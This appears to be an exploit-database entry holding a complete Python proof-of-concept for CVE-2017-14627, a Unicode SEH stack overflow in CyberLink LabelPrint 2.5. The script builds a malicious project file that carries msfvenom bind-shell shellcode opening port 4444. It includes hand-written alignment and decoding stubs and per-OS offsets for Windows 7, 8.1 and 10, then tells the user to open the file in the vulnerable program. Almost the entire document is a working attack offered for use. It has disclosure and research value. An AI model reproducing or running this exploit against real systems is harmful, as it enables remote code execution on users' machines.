CyberLink LabelPrint < 2.5 - Buffer Overflow (SEH Unicode)



EKU-ID: 6953 CVE: 2017-14627 OSVDB-ID:
Author: f3ci Published: 2017-09-26 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python
# Exploit Title: CyberLink LabelPrint <=2.5 File Project Processing Unicode Stack Overflow
# Date: September 23, 2017
# Exploit Author: f3ci
# Vendor Homepage: https://www.cyberlink.com/
# Software Link: http://update.cyberlink.com/Retail/Power2Go/DL/TR170323-021/CyberLink_Power2Go_Downloader.exe
# Version: 2.5
# Tested on: Windows 7x86, Windows8.1x64, Windows 10
# CVE : CVE-2017-14627
#
# Note: Cyberlink LabelPrint is bundled with Power2Go application and also included in most HP, Lenovo, and Asus laptops.
# this proof of concept is based on the LabelPrint 2.5 that comes with Power2Go installation.

def exp():
    header = ("\x3c\x50\x52\x4f\x4a\x45\x43\x54\x20\x76\x65\x72\x73\x69\x6f\x6e"
    "\x3d\x22\x31\x2e\x30\x2e\x30\x30\x22\x3e\x0a\x09\x3c\x49\x4e\x46"
    "\x4f\x52\x4d\x41\x54\x49\x4f\x4e\x20\x74\x69\x74\x6c\x65\x3d\x22"
    "\x22\x20\x61\x75\x74\x68\x6f\x72\x3d\x22\x22\x20\x64\x61\x74\x65"
    "\x3d\x22\x37\x2f\x32\x34\x2f\x32\x30\x31\x37\x22\x20\x53\x79\x73"
    "\x74\x65\x6d\x54\x69\x6d\x65\x3d\x22\x32\x34\x2f\x30\x37\x2f\x32"
    "\x30\x31\x37\x22\x3e")
    filename2 = "labelprint_poc_universal.lpp"
    f = open(filename2,'w')
    junk = "A" * 790
    nseh = "\x61\x42"
    seh = "\x2c\x44"
    nop = "\x42"
 
    #msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/unicode_mixed BufferRegister=EAX -f python
    buf = ""
    buf += "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQ"
    buf += "AIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA"
    buf += "ZBABABABABkMAGB9u4JBkL7x52KPYpM0aPqyHeMa5pbDtKNpNPBk"
    buf += "QBjlTKaBkd4KD2mXzo87pJlfNQ9ovLOLs1cLIrnLMPGQfoZmyqI7"
    buf += "GrZRobnwRk1Bn0bknjOLDKPLkaQhGsNhzawaOa4KaIO0M1XSbka9"
    buf += "lXISmja9Rkp4TKM1FvMaYofLfaXOjmYqUw08wp0uJVJcqmYhmk3M"
    buf += "o4rUk41HTK28NDjaFsrFRklLPK4KaHklzaICTKytbkM1VpSYa4nD"
    buf += "NDOkaKaQ291JoaIoWpqOaOQJtKN2HkTMOmOxOCOBIpm0C8CGT3oB"
    buf += "OopTC80L2WNFzgyoz5Txf0ZaYpm0kyfdB4np38kycPpkypIoiEPj"
    buf += "kXqInp8bKMmpr010pPC8YZjoiOK0yohU67PhLBypjq1L3YzF1ZLP"
    buf += "aFaGPh7R9KoGBGKO8U271XEg8iOHIoiohUaGrH3DJLOK7qIo9EPW"
    buf += "eG1XBU0nnmc1YoYEC81SrMs4ip4IyS27ogaGnQjVaZn2B9b6jBkM"
    buf += "S6I7oTMTMliqkQ2m14nDN0UvKPndb4r0of1FNv0Fr6nn0VR6B31F"
    buf += "BH49FlmoTFyoIEbi9P0NPVq6YolpaXjhsWmMc0YoVuGKHpEe3rnv"
    buf += "QXVFce5mcmkOiEMlKV1lLJ3Pyk9PT5m5GKoWZsSBRO2JypPSYoxUAA"
   

    #preparing address for decoding
    ven = nop               #nop/inc edx
    ven += "\x54"           #push esp
    ven += nop              #nop/inc edx
    ven += "\x58"           #pop eax
    ven += nop              #nop/inc edx
    ven += "\x05\x1B\x01"   #add eax 01001B00 universal
    ven += nop              #nop/inc edx
    ven += "\x2d\x01\x01"   #sub eax 01001000
    ven += nop              #nop/inc edx
    ven += "\x50"           #push eax
    ven += nop              #nop/inc edx
    ven += "\x5c"           #pop esp

    #we need to encode the RET address, since C3 is bad char.
    #preparing ret opcode
    ven += nop              #nop/inc edx
    ven += "\x25\x7e\x7e"   #and eax,7e007e00
    ven += nop              #nop/inc edx
    ven += "\x25\x01\x01"   #and eax,01000100
    ven += nop              #nop/inc edx
    ven += "\x35\x7f\x7f"   #xor eax,7f007f00
    ven += nop              #nop/inc edx
    ven += "\x05\x44\x44"   #add eax,44004400
    ven += nop              #nop/inc edx
    ven += "\x57"           #push edi
    ven += nop              #nop/inc edx
    ven += "\x50"           #push eax
    ven += junk2            #depending OS
  
    #custom venetian
    ven += "\x58"           #pop eax
    ven += nop              #nop/inc edx
    ven += "\x58"           #pop eax
    ven += nop              #nop/inc edx
    ven += align            #depending OS
    ven += nop              #nop/inc edx
    ven += "\x2d\x01\x01"   #add eax, 01000100 #align eax to our buffer
    ven += nop              #nop/inc edx
    ven += "\x50"           #push eax
    ven += nop              #nop/inc edx
 
    #call esp 0x7c32537b MFC71U.dll
    ven += "\x5C"           #pop esp
    ven += nop              #nop/inc edx
    ven += "\x58"           #pop eax
    ven += nop              #nop/inc edx
    ven += "\x05\x53\x7c"   #add eax 7c005300 part of call esp
    ven += nop              #nop/inc edx
    ven += "\x50"           #push eax
    ven += junk1            #depending OS
    ven += "\x7b\x32"       #part of call esp
 
    #preparing for shellcode
    ven += nop * 114        #junk
    ven += "\x57"           #push edi
    ven += nop              #nop/inc edx
    ven += "\x58"           #pop eax
    ven += nop              #nop/inc edx
    ven += align2           #depending OS
    ven += nop              #nop/inc edx
    ven += "\x2d\x01\x01"   #sub eax,01000100
    ven += nop              #nop/inc edx
    ven += buf              #shellcode

    sisa =  nop * (15000-len(junk+nseh+seh+ven))
    payload = junk+nseh+seh+ven+sisa
    bug="\x09\x09\x3c\x54\x52\x41\x43\x4b\x20\x6e\x61\x6d\x65\x3d"+'"'+payload+'"'+"/>\n"
    bug+=("\x09\x3c\x2f\x49\x4e\x46\x4f\x52\x4d\x41\x54\x49\x4f\x4e\x3e\x0a"
    "\x3c\x2f\x50\x52\x4f\x4a\x45\x43\x54\x3e")
    f.write(header+ "\n" + bug)

    print "[+] File", filename2, "successfully created!"
    print "[*] Now open project file", filename2, "with CyberLink LabelPrint."
    print "[*] Good luck ;)"
    f.close()
 
print "[*] <--CyberLink LabelPrint <=2.5 Stack Overflow POC-->"
print "[*] by f3ci & modpr0be <research[at]spentera.id>"
print "[*] <------------------------------------------------->\n"
print "\t1.Windows 7 x86 bindshell on port 4444"
print "\t2.Windows 8.1 x64 bindshell on port 4444"
print "\t3.Windows 10 x64 bindshell on port 4444\n"
input = input("Choose Target OS : ")
try:
    if input == 1:
            align   = "\x05\x09\x01"    #add eax,01000400
            align2  = "\x05\x0A\x01"    #add eax, 01000900
            junk1   = '\x42' * 68       #junk for win7x86
            junk2   = '\x42' * 893      #junk for win7x86
            exp()
    elif input == 2:
            align   = "\x05\x09\x01"    #add eax,01000400
            align2  = "\x05\x0A\x01"    #add eax, 01000900
            junk1   = '\x42' * 116      #junk for win8.1x64
            junk2   = '\x42' * 845      #junk for win8.1x64
            exp()
    elif input == 3:
            align   = "\x05\x05\x01"    #add eax,01000400
            align2  = "\x05\x06\x01"    #add eax, 01000900
            junk1   = '\x42' * 136      #junk for win10x64
            junk2   = '\x42' * 313      #junk for win10x64
            exp()   
    else:
            print "Choose the right one :)"
except:
    print ""